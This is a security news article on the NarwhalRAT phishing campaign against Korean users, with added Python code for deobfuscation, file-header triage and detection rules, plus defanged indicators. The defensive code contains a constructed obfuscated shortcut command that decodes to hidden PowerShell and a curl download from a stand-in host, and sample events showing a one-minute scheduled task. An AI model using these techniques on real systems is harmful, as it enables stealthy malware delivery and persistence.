Hackers News
Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy

Sarah Simpson
June 15, 2026

Korean users are currently facing a sophisticated malware campaign. This stealthy operation leverages a meticulously crafted chain of deception to deploy its malicious payload.

Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.

The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.”

The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document.

Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.

Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea.

The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight.

It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.

The threat actor operates a dual command-and-control structure: a Korean relay server alongside the pCloud API used as a dead drop resolver. The attacker can therefore change the real C2 address without touching the malware, and the beaconing blends in with ordinary cloud-storage traffic, which makes detection harder.

NarwhalRAT Loader Attack

When a victim opens the malicious LNK file, a layered infection chain begins. The LNK's command line uses cmd.exe environment-variable substring expansion (the %VAR:~start,len% syntax) to hide the real commands: strings such as "powershell" and "curl.exe" are rebuilt at runtime from slices of ordinary environment variables, so neither string appears literally for static scanners to match.

After the tokens are expanded, the LNK launches PowerShell with the execution policy bypassed and uses a copy of curl.exe to download two files from the relay server.

The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window.
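To see how the substring trick works, and to undo it during triage, here is an added Python example; it is not code from the article or from Genians. It expands %VAR:~start,len% and %VAR% tokens against a given environment the way cmd.exe does. The environment values and the shortcut argument string below are constructed for the demo; only the technique (slicing ordinary variables to spell out powershell and curl.exe) mirrors what the article describes.

```python
import re

# Constructed environment for the demo: values a stock Windows install exposes,
# chosen only so the example resolves offline. They are not values recovered
# from the NarwhalRAT LNK.
DEMO_ENV = {
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "ProgramFiles": r"C:\Program Files",
    "PSModulePath": r"C:\Program Files\WindowsPowerShell\Modules",
    "PUBLIC": r"C:\Users\Public",
    "SystemRoot": r"C:\Windows",
    "TEMP": r"C:\Users\Public\AppData\Local\Temp",
}

# %VAR:~start% or %VAR:~start,len% (cmd.exe substring expansion)
_SUBSTR = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*):~(-?\d+)(?:,(-?\d+))?%")
# plain %VAR%
_PLAIN = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)%")


def _lookup(env, name):
    """cmd.exe matches variable names case-insensitively."""
    for key, value in env.items():
        if key.lower() == name.lower():
            return value
    return None


def _substr(value, start, length):
    """cmd.exe substring rules: a negative start counts back from the end,
    a negative length drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]


def count_substring_refs(cmdline):
    """How many %VAR:~...% tokens a command line carries; more than a couple in a
    shortcut's argument string is itself a strong hunting signal."""
    return len(_SUBSTR.findall(cmdline))


def expand_cmd_substrings(cmdline, env=DEMO_ENV):
    """Resolve substring references, then plain %VAR% references, as cmd.exe would.
    Tokens naming a variable absent from env are left untouched, which is what
    cmd.exe does on a command line (inside a batch file they would become empty)."""
    def sub_ref(m):
        value = _lookup(env, m.group(1))
        if value is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return _substr(value, int(m.group(2)), length)

    def plain_ref(m):
        value = _lookup(env, m.group(1))
        return m.group(0) if value is None else value

    return _PLAIN.sub(plain_ref, _SUBSTR.sub(sub_ref, cmdline))


# Constructed LNK argument string in the style the article describes: neither
# "powershell" nor "curl.exe" appears literally; both are spelled out from slices.
DEMO_LNK_ARGS = (
    "/c "
    "%TEMP:~-1%%ComSpec:~7,2%%ComSpec:~-1%%ProgramFiles:~4,1%%ComSpec:~9,1%%PSModulePath:~30,4%"
    " -ep bypass -w hidden "
    r"%SystemRoot%\System32\%ComSpec:~20,1%%PUBLIC:~10,1%%ProgramFiles:~4,1%%PUBLIC:~12,1%%ComSpec:~-4%"
    r" -o %PUBLIC%\update.bat https://relay.example/"
)

if __name__ == "__main__":
    print(count_substring_refs(DEMO_LNK_ARGS), "substring references")
    print(expand_cmd_substrings(DEMO_LNK_ARGS))
```

The environment only needs to be approximately right: obfuscators lean on variables whose values are fixed on every install (ComSpec, PSModulePath, ProgramFiles), so expanding against a default Windows environment recovers the command even when the victim host is not available.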

Abusing built-in tools this way is classified as Living-off-the-Land. The batch file then downloads the official Python embeddable package so that the activity resembles a normal software installation.

It renames pythonw.exe, the interpreter build that runs without a console window, to usersscreen.exe so the process name does not stand out. The final payload, config.cat, carries a .cat extension to resemble a Windows security catalog; it is actually compiled Python bytecode that acts as the backdoor loader.

Decrypted batch file commands (Source: Genians)

For persistence, the malware registers a scheduled task named "MicrosoftUserInterfacePicturesUpdateTackMachine" that runs at one-minute intervals. The name copies the style of legitimate Microsoft maintenance tasks, so it is easy to overlook during a manual review of the task list.

A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload.
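A quick way to catch the .cat disguise, for config.cat and AccountConfig.cat alike, is to ignore the extension and read the header: a genuine security catalog is a PKCS#7 SignedData blob, while compiled Python bytecode starts with a magic word that CPython always follows with \r\n. The following Python is an added example, not code from the article or from Genians; the sample byte strings are constructed, and the version table is this example's own assumption.

```python
import struct

# CPython magic words (little-endian u16 at offset 0 of a .pyc) for the releases
# this example recognises. The table is an assumption of this example, not from the report.
PYC_MAGIC_VERSIONS = {
    3413: "3.8", 3425: "3.9", 3439: "3.10", 3495: "3.11", 3531: "3.12", 3571: "3.13",
}
# DER encoding of OID 1.2.840.113549.1.7.2 (PKCS#7 signedData); a genuine Windows
# security catalog carries it right after its outer SEQUENCE header.
_SIGNED_DATA_OID = bytes.fromhex("06092a864886f70d010702")
# what the header should say for the extensions this triage cares about
_EXPECTED_KIND = {"cat": "pkcs7-signed", "pyc": "cpython-pyc", "exe": "pe", "dll": "pe"}


def classify_header(data: bytes) -> str:
    """Identify a file from its first bytes, ignoring the extension entirely."""
    if len(data) >= 4 and data[2:4] == b"\r\n":
        # every CPython .pyc magic word is followed by \r\n, so a text-mode
        # transfer corrupts the file instead of silently loading it
        return "cpython-pyc"
    if data[:2] == b"MZ":
        return "pe"
    if data[:1] == b"\x30" and _SIGNED_DATA_OID in data[:32]:
        return "pkcs7-signed"
    return "unknown"


def pyc_details(data: bytes) -> dict:
    """Decode the 16-byte PEP 552 header of a .pyc: magic, flags, then either the
    source mtime and size (flags == 0) or a hash of the source."""
    magic = struct.unpack("<H", data[:2])[0]
    flags = struct.unpack("<I", data[4:8])[0]
    info = {"magic": magic, "python": PYC_MAGIC_VERSIONS.get(magic, "unknown"), "flags": flags}
    if flags == 0:
        info["source_mtime"], info["source_size"] = struct.unpack("<II", data[8:16])
    else:
        info["source_hash"] = data[8:16].hex()
    return info


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the bytes disagree with what the extension claims."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = _EXPECTED_KIND.get(ext)
    return expected is not None and classify_header(data) != expected


# Constructed samples (not bytes from the real files): a Python 3.9 .pyc header
# with a timestamp-style trailer and a dummy body, and the opening bytes of a
# genuine-looking catalog (outer SEQUENCE, then the signedData OID).
FAKE_CONFIG_CAT = b"\x61\x0d\x0d\x0a" + struct.pack("<III", 0, 1700000000, 4096) + b"\xe3\x00\x00\x00"
GENUINE_CAT = b"\x30\x82\x06\xf6" + _SIGNED_DATA_OID + b"\xa0\x82\x06\xe7"

if __name__ == "__main__":
    for name, blob in (("config.cat", FAKE_CONFIG_CAT), ("legit.cat", GENUINE_CAT)):
        print(name, classify_header(blob), "MISMATCH" if extension_mismatch(name, blob) else "ok")
    print(pyc_details(FAKE_CONFIG_CAT))
```

The magic word also tells you which interpreter the loader needs, which is worth cross-checking against the version of the embeddable package the batch file fetched: a mismatch there means the sample you are holding is not the one that ran.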

NarwhalRAT Capabilities and C2 Communication

Once the payload has been loaded into memory, NarwhalRAT reveals itself as a fully featured remote access trojan. It first checks for virtual machine environments, including VMware, VirtualBox, and Parallels Desktop, to avoid sandbox analysis, a tactic typical of APT-level malware.

The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes.

Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances.

Prefix-based command control system (Source: Genians)

From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, and uses pCloud as a secondary dead drop resolver channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse of LNK files and PowerShell.

Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.
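Those behavioral rules, written out as an added Python example (not from the article or from Genians) over constructed Sysmon process-creation records. The event fields, paths and benign records are assumptions made for the demo; the rules encode the chain described above: unexpanded %VAR:~n,m% tokens on a cmd.exe command line, PowerShell with the execution policy bypassed and a hidden window, a curl.exe that is not the System32 copy or is spawned by PowerShell, schtasks creating a one-minute task, a process whose PE OriginalFileName is pythonw.exe under a different image name, a Python host handed a non-Python file, and anything executing from C:\Users\Public.

```python
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
POWERSHELLS = {"powershell.exe", "pwsh.exe"}
PYTHON_HOSTS = {"python.exe", "pythonw.exe"}
PYTHON_EXTS = {".py", ".pyw", ".pyc", ".pyz"}


def _base(path):
    return ntpath.basename(path or "").lower()


def _args(cmdline):
    """Split a Windows command line on whitespace, keeping quoted chunks whole."""
    return [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', cmdline or "")][1:]


def rule_cmd_substring_obfuscation(ev):
    # explorer starts the LNK target with the %VAR:~n,m% tokens still unexpanded;
    # cmd.exe expands them only after it has been launched
    return _base(ev["Image"]) == "cmd.exe" and ev["CommandLine"].count(":~") >= 3


def rule_powershell_hidden_bypass(ev):
    cl = ev["CommandLine"]
    return (_base(ev["Image"]) in POWERSHELLS
            and re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cl, re.I) is not None
            and re.search(r"-w(?:indowstyle)?\s+hidden", cl, re.I) is not None)


def rule_curl_from_script_host(ev):
    # a curl.exe that is not the System32 copy, or one spawned by PowerShell
    if ev.get("OriginalFileName", "").lower() != "curl.exe":
        return False
    outside_system = not ev["Image"].lower().startswith(SYSTEM_DIRS)
    return outside_system or _base(ev["ParentImage"]) in POWERSHELLS


def rule_high_frequency_scheduled_task(ev):
    cl = ev["CommandLine"]
    if _base(ev["Image"]) != "schtasks.exe" or not re.search(r"/create\b", cl, re.I):
        return False
    if not re.search(r"/sc\s+minute\b", cl, re.I):
        return False
    mo = re.search(r"/mo\s+(\d+)", cl, re.I)
    return mo is None or int(mo.group(1)) == 1   # /mo defaults to 1 for MINUTE


def rule_renamed_python(ev):
    # Sysmon's OriginalFileName comes from the PE version resource, not the file name
    return (ev.get("OriginalFileName", "").lower() in PYTHON_HOSTS
            and _base(ev["Image"]) not in PYTHON_HOSTS)


def rule_python_loads_odd_extension(ev):
    if ev.get("OriginalFileName", "").lower() not in PYTHON_HOSTS:
        return False
    return any(ntpath.splitext(a)[1].lower() not in PYTHON_EXTS
               for a in _args(ev["CommandLine"]) if ntpath.splitext(a)[1])


def rule_exec_from_public_dir(ev):
    return ev["Image"].lower().startswith("c:\\users\\public\\")


RULES = [(f.__name__[5:], f) for f in (
    rule_cmd_substring_obfuscation, rule_powershell_hidden_bypass, rule_curl_from_script_host,
    rule_high_frequency_scheduled_task, rule_renamed_python, rule_python_loads_odd_extension,
    rule_exec_from_public_dir)]


def evaluate(events):
    """Return {ProcessId: set of rule names} for every event that matched anything."""
    hits = {}
    for ev in events:
        names = {name for name, fn in RULES if fn(ev)}
        if names:
            hits[ev["ProcessId"]] = names
    return hits


# Constructed Sysmon Event ID 1 records reduced to the fields the rules need.
# Names follow the article; paths and parents are assumptions. None of this is real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_DIR = r"C:\Users\Public\AccountPictures\UserInerfacePicture"
EVENTS = [
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c %TEMP:~-1%%ComSpec:~7,2%%ComSpec:~-1%%ProgramFiles:~4,1%%ComSpec:~9,1%%PSModulePath:~30,4% -ep bypass -w hidden ...'},
    {"ProcessId": 4112, "Image": PS, "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -ep bypass -w hidden "copy C:\Windows\System32\curl.exe C:\Users\Public\curl.exe"'},
    {"ProcessId": 4120, "Image": r"C:\Users\Public\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": PS,
     "CommandLine": r"C:\Users\Public\curl.exe -s -o C:\Users\Public\KHjWFcuS.bat https://relay.example/stage2"},
    {"ProcessId": 4133, "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /f /sc minute /mo 1 /tn MicrosoftUserInterfacePicturesUpdateTackMachine /tr "' + STAGE_DIR + r'\usersscreen.exe config.cat"'},
    {"ProcessId": 4150, "Image": STAGE_DIR + r"\usersscreen.exe", "OriginalFileName": "pythonw.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"' + STAGE_DIR + r'\usersscreen.exe" config.cat'},
    # two benign records the rules must leave alone
    {"ProcessId": 5000, "Image": r"C:\Program Files\Python312\python.exe", "OriginalFileName": "python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "python.exe build.py"},
    {"ProcessId": 5001, "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc daily /st 02:00 /tn NightlyBackup /tr C:\Tools\backup.cmd"},
]

if __name__ == "__main__":
    for pid, names in sorted(evaluate(EVENTS).items()):
        print(pid, sorted(names))
```

The renamed-interpreter rule is the one worth keeping even after this campaign: it needs OriginalFileName from the PE version resource, which Sysmon and most EDRs record, and it is indifferent to whatever name the next loader picks instead of usersscreen.exe.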

Indicators of Compromise (IoCs):

Domains
  daehoat[.]com: primary C2, Korean relay server
  novel21[.]co[.]kr: primary C2, Korean relay server
  fe01[.]co[.]kr: initial ZIP file download relay
  webhostingkorea[.]com: secondary relay used in the LNK and BAT download stages

File names
  Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).lnk: malicious LNK file inside the phishing ZIP
  Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).zip: phishing ZIP archive attachment
  KHjWFcuS.bat: second-stage batch file delivering the Python loader
  config.cat: Python bytecode backdoor loader disguised as a Windows catalog file
  AccountConfig.cat: subsequent large Python payload with obfuscated RAT code
  usersscreen.exe: renamed pythonw.exe used to silently execute the payload

Scheduled task
  MicrosoftUserInterfacePicturesUpdateTackMachine: persistence task running at one-minute intervals

File paths (the source listing had its backslashes stripped; separators are restored only where unambiguous, and the final directory names are given as they appeared)
  C:\Users\Public\AccountPictures\UserInerfacePicture: directory where payload files are deployed
  C:\ProgramData\GoogleDriveUpdateCheck: directory where AccountConfig.cat is stored

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
